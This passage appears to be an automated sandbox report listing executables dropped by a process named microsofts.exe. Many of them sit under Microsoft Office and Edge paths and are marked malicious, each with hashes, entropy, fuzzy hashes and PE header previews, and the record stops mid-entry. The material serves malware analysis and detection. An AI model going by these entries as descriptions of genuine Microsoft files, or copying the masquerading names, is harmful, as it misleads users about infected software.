Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1343488
Entropy (8bit):	5.236033946276869
Encrypted:	false
SSDEEP:	12288:cjuozQMGNUbTYXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:IfEsqjnhMgeiCl7G0nehbGZpbD
MD5:	89B98B5961C68E09E54B59C69C257D15
SHA1:	E02DCA0A49150BD083E7D920B51E929F56084D00
SHA-256:	3BF90FF472520F7CCBA298D32B9DCB623F532CA8CE8852C8855D555A9FCF96B9
SHA-512:	9C913F78EAEE7BB085B9B804BF75C0AFA6D0E2B884C7EEC71179B227E7F7650CEAD26CFC8A08947F97417097B0CBCF17FBD39E3C7067DCAABED596F162988645
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@....................................(..... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1496064
Entropy (8bit):	5.577928287086197
Encrypted:	false
SSDEEP:	24576:RbUO42i/E9sqjnhMgeiCl7G0nehbGZpbD:RJhDmg27RnWGj
MD5:	6F11B5284527654C70BC594F64209416
SHA1:	E371B6045E3FDA57A2002B44BCA2A022B2CFA709
SHA-256:	229DD629FBED0D28CDECE594E205E6134E356EB755C360F22F17301556F39934
SHA-512:	880639A7B2AA65496A171E95A53F7C7CFCA6BC86EEC74EC94C0EC2E37952B9D721C5E211D29D900104EDF29066DF53F09FB35EF92C86BC9460CB66B49447019F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@.......................... .......7........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.9618388295563784
Encrypted:	false
SSDEEP:	1572864:6LjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:+icZmsR3Lo/cnLe
MD5:	BBF9D63EC533CCAB320D42CB60B8F975
SHA1:	9DDFCC7A586B41D35734BE8EE49CAD738265CDF6
SHA-256:	9FBB3041BA887D070AF6AA47B64B3ACB255312E9378412D26FA82330940D1624
SHA-512:	912FD84D1F4F0363D4D524720BF0490667E9A4020E5DA211A3C7D7F07DAA7F43AD70D5E7303150D38C7968DAC49F233FC4A3A6B38DD29E5828E8671EADFC47C2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1657344
Entropy (8bit):	5.635136228903538
Encrypted:	false
SSDEEP:	24576:8E8DMeflpnIOvYUgsqjnhMgeiCl7G0nehbGZpbD:8tDD9pnIOKDmg27RnWGj
MD5:	638EF595DC39281F524195E909D03DEB
SHA1:	940A07ADDB8118464C6162F74285FF87AB561BC3
SHA-256:	01A95F02B478A164942B8BF0B5D33181466BC71EC32F59C99A6E8D8B4FA5C832
SHA-512:	4E156EC51520E2CC852FD0A05FA41DAABA3E065D47260CD1F8D4FFD1E51E29660F1CB0173B1CB290D4F037692A0477A24D3AF3934C5F8238B1D0791ACDB7472F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.748481649422232
Encrypted:	false
SSDEEP:	49152:/B1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EBDmg27RnWGj:THzorVmr2ZkRpdJYolzD527BWG
MD5:	E6BD081369A8D04A1B07812A814B087F
SHA1:	A6B714D0D3056757E81A5182EFEF92BB6531A1AC
SHA-256:	8DC7F2A8B4B3181E9C7102A2DD7268EF7B39E8A3E7097188690D9064ADECE994
SHA-512:	7C793343FD0B0233C20906A6BF98EFB5FDD1E06EE24E3CA3A2CD8E0865D78E0EE842DC0453C9C00AA66B53590DE09296B615962FF44CAD581EE07600A7B9953D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......_C... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1238528
Entropy (8bit):	5.14694353280366
Encrypted:	false
SSDEEP:	12288:D3w1uVdSEjWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:DEyTWsqjnhMgeiCl7G0nehbGZpbD
MD5:	79FF49B47E833EF100E79920BD11E496
SHA1:	04A9C1C37A51A2A081934E8D05915B4A35C00401
SHA-256:	C1E8763E9B6475F43C389BB81802E3F0EE0EAFC0ED3E404DD1511ED81CB2AEBD
SHA-512:	336F045564ABAC565B715BEFBCDCB1D273E5C985EF3AA145FE622C06607678F788F37E46BF4B04D522DC23C9861AC7B9F6758F5BF9681B17CE7C356B49882DC9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P......nw.... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.049999640601473
Encrypted:	false
SSDEEP:	49152:ChDdVrQ95RW0YEHyWQXE/09Val0G1Dmg27RnWGj:ChHYW+HyWKaD527BWG
MD5:	88EB3A4B54A3BB575F73218A2A487C14
SHA1:	3983ACE390276981C42D9B9C0BB3D67F4DEFAAD1
SHA-256:	49B7D9FCE40F8232F898E3E008C6ED0B8D11FF9E058978F3AC4474F1A2F8DF95
SHA-512:	91AEF47592969D0D86D65CD2F9A8FAA644960FF49D56E6F8FA99EA3CE7410EBE1381913EB5A1424B886D9F0564EAA225BCF4E78B059BB39E8CFB64E711DC99E7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......&$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.158488982991711
Encrypted:	false
SSDEEP:	24576:k70E0ZCQZMiU6Rrt9RoctGfmddNsqjnhMgeiCl7G0nehbGZpbD:g0EzQSyRPRoc11Dmg27RnWGj
MD5:	E7467D16F848F32A8D05B0D67407D2D7
SHA1:	5A2A7CE7A3A64A8686898CD4DAB6E87A6DEB56C3
SHA-256:	B3F0FE111ECBC1D261EDEAC8264693BA575ABA7622C4CA8ED3983A33B82FD5E3
SHA-512:	6BF615E2BC626EECD572CECD776926E1A07C85DF455A85D5C0F515537C3FECD99200DDD74BFDF5469A915A5FC62B383F28E8C824A8B8F59A06981A7A7DB18E4C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......74.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145476092607803
Encrypted:	false
SSDEEP:	24576:1iD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:ED2VmAyiwIb8boQhDmg27RnWGj
MD5:	1948A5B34A2BB84200A3EDF952B85F36
SHA1:	E25DDACEC0A473B424BD0C1CB1376D67636E55F5
SHA-256:	50AE6310A34CF2E93A9B63979D12C82660920FFD64C6BC91D7FA5A03ABA5D107
SHA-512:	5610137837E5F1C14AF83E03D6C192DE3AF9CFE7C9F513405A4880E51C8F9E37C74C62B58F4300A65E0A266C98BC329102DE49A2DEA25A8DF704CC4B03B54D8C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......'..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.950752929486442
Encrypted:	false
SSDEEP:	49152:ufD3zO9ZhBGloizM3HRNr00ZDmg27RnWGj:UDaalxzM00ZD527BWG
MD5:	482C01E7FC281E2AFBC4E7F797298A3D
SHA1:	D29C7D1BCDADA3EFD4B27ACE866904415B1B838D
SHA-256:	31123D1811BFAE0E3CDDA25494AD6F79ABA70B86CDE74406783B5356B40B0099
SHA-512:	5539F11BC22A0D7B6C649CC517CD54EF68587B744A4F97A0204402085641FDD6FCB076F303E74E8A6E0034DA277417D221BA5F49D0361BC5D95BF78523A4F2B6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....7.+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.8246116814927245
Encrypted:	false
SSDEEP:	49152:QTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhSDmg27RnN:7I72LvkrDpbxJRoIMxD527BWG
MD5:	9C00E53023D2D9DDC6D27B6212527465
SHA1:	8F867D3052FE689E7624C41C1D66CAD522548C71
SHA-256:	95B08CB8DAA6EDAC9888DB6C454D43CF8F028802F5AF9C5FE3AE2DEDD44E42A1
SHA-512:	C96FC26B0A19713B6EA5A84C4CB4D3378782A19C57C0BB7CFD40060CD3F4A1592796827142F4F3EFD91ACFE2A8F584AF01D02A7AC470871B7AE11F2B1121C4AE
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.097237495170472
Encrypted:	false
SSDEEP:	24576:lW9Jml9mmijviMnF+ZxmQWcbLw8VdsqjnhMgeiCl7G0nehbGZpbD:lWnm5iOMkjmQWkVBDmg27RnWGj
MD5:	FA1876CD50010BF4957858248BEB03B6
SHA1:	8994E7C17059A20E6874105D716C5FD05219984A
SHA-256:	DC22F431E2C03C1713729F425B5A242C69E5ED880C439984A3C42B787B66C801
SHA-512:	220655746127633D1D1C35A6219810FC4B5F59D5A17B227942EAC4DF84312E0F3AEAE1E4471FFE7F5320290BB79923604128B8A8998C35B80FBFD54779ED97BB
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166362407409083
Encrypted:	false
SSDEEP:	24576:awNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:awNPdQO7BJTfmEEDmg27RnWGj
MD5:	48421AC33512CBFCAC927D90CAB45505
SHA1:	701CE66FDD7F1FA35DC9450EADDEE03A123BCC1A
SHA-256:	3E42162D587B8D58FFC5DA06B443996BBE80675B0F281B71D5FDADA54C45F611
SHA-512:	AEA39B9067EC93744D68D895C070E79530C03391A87CD98B61F4FE09B0548D1C25A9F4405A5E19E2375CF9F4F40FD2624E15216337B4CCE49CF2579BBF9DD69C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.14548557388253
Encrypted:	false
SSDEEP:	24576:iiD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:RD2VmAyiwIb8boQhDmg27RnWGj
MD5:	721987F3574BCF06278F95895CCF01A5
SHA1:	2439B08AF5046409A7892BCF9B7F0C5B1E08EA31
SHA-256:	BC4E96491C5375A12CA55F468500D1DCF262D4B8DF4679BD537820E894231769
SHA-512:	A76B6E5697AC7204DC278E9B62BD3F8EFDB1AB61A03364F1A37703F3A25D797B8CCE38D7BE1B0A6BA8A12282F76EBE5B18355115D249E5B976127545745F902C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......e1.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166370833152202
Encrypted:	false
SSDEEP:	24576:vwNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:vwNPdQO7BJTfmEEDmg27RnWGj
MD5:	2D415B0A584B8D738F2D7DBCBA97A7CA
SHA1:	71EEB7D8AD3BB01DED052BEA7111A06699BA764E
SHA-256:	F4858EFEC2FC0BC0DC4A8EEF6E08899518698EA27E7E325F6B2AEDB9DA5AC86B
SHA-512:	0C3C970A2760FD316AD09A75A644FFE2EBE15B7049955150454C396739E477B40727730D29A678277871AFF8687E296C0FAEBE3A3B1D4A8516F5F78170C6BB52
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1325568
Entropy (8bit):	5.141854698834957
Encrypted:	false
SSDEEP:	24576:g4lbht6BHksqjnhMgeiCl7G0nehbGZpbD:xlNtqHADmg27RnWGj
MD5:	5DDF691A2C804F000152A7A8396100EE
SHA1:	7661F929F5FAE1563F9068E36099A978C852A6B5
SHA-256:	605CC5BAE8E5642A64254D6155674709B89719EEE20DEAF6D5E03243380ECC94
SHA-512:	01EC4B894F7A13C29AC1052A120D24A5FCF6C7135A6B3AF8602A83FB21BB256D40C0C6AF22F51045DD4F44E7605F4D653DF21DB8999C29E9FA327C019636F1BE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.........................................................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138862037346404
Encrypted:	false
SSDEEP:	12288:UIkOkTB+wYXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:UIxkTBVYsqjnhMgeiCl7G0nehbGZpbD
MD5:	D0BCE62D7A9F606809B6BFE9A5BBA508
SHA1:	B07AD7A64B1288F241F962DC2E8AC1F3F0295480
SHA-256:	4E597DBFFDE6FF2503C12ABD7AEE165332512E91F58413D243DD0600E8E2A6E0
SHA-512:	538F1E18DD551634C1C65094D35DF82DD697DB2FF035BF4C1BD4B3A142EE5607D3A5015BAC99B42EEEEDBB51EADF049FB61DC7D9BFE21488F16F4AC094413E92
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1335296
Entropy (8bit):	5.236795081971282
Encrypted:	false
SSDEEP:	12288:g4lssmroCvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:gcssmrZsqjnhMgeiCl7G0nehbGZpbD
MD5:	CD7191691C75D9D77AFD79DCF1574402
SHA1:	822F04FD96BEF2F82DA3E9597AC3F4527C16A0C1
SHA-256:	8665F5EA23CA645E8E193190F92245BFABCB90375E10F98EBDA859FF2D0F050F
SHA-512:	9FCBD6BD54F5DB67F094A568BC44AA7087A5E686BB34A989BFBBE3BC717ECD867636013BA1BE5D43EF0D486621A16111032D211F6460FB1EDF800168B3B619CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	5.338536662090436
Encrypted:	false
SSDEEP:	24576:/03cT++foSBWU2YxhkgesqjnhMgeiCl7G0nehbGZpbD:c3cK+foQWU2YnPyDmg27RnWGj
MD5:	63FA4831CDC656AB3A07A1B454BDF8A1
SHA1:	4592D3B3D944EB330BF638B35769821A4EAB09A8
SHA-256:	D48C3BE87A476DEAD13C680767210FC77D6780F39395C4AB710E2C9FF3AED6BC
SHA-512:	BE6E859E8648D5F0F06975FCA3150FE92B3CB2DC8081B7DB366CCF4B72725DBC7EDF27AC022E568002DDAFA3645ED78C048CF56E6FEEF7ADF8F5C5026A8CCF2E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................m........................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138911001498245
Encrypted:	false
SSDEEP:	12288:AbrNRzB+N+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:AbBRzBg+sqjnhMgeiCl7G0nehbGZpbD
MD5:	C3368C35BAC54E10152248B522E04F36
SHA1:	8CD82F59005440668E14D43898A6E8B4C4DEC9A8
SHA-256:	9A50D49BA9908D717F11DFD09A25C9E33297FE6BFDB4D9AD1A8821D7D9C17063
SHA-512:	A1C1E4846C0C8D87C6214CE09946B93E42C3068F9DA7CCB2E446E2B759C53E1E200102C381C989DAFF4313D0D1922692EF355BFFB927FF4FF35491DAE9CC4F63
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
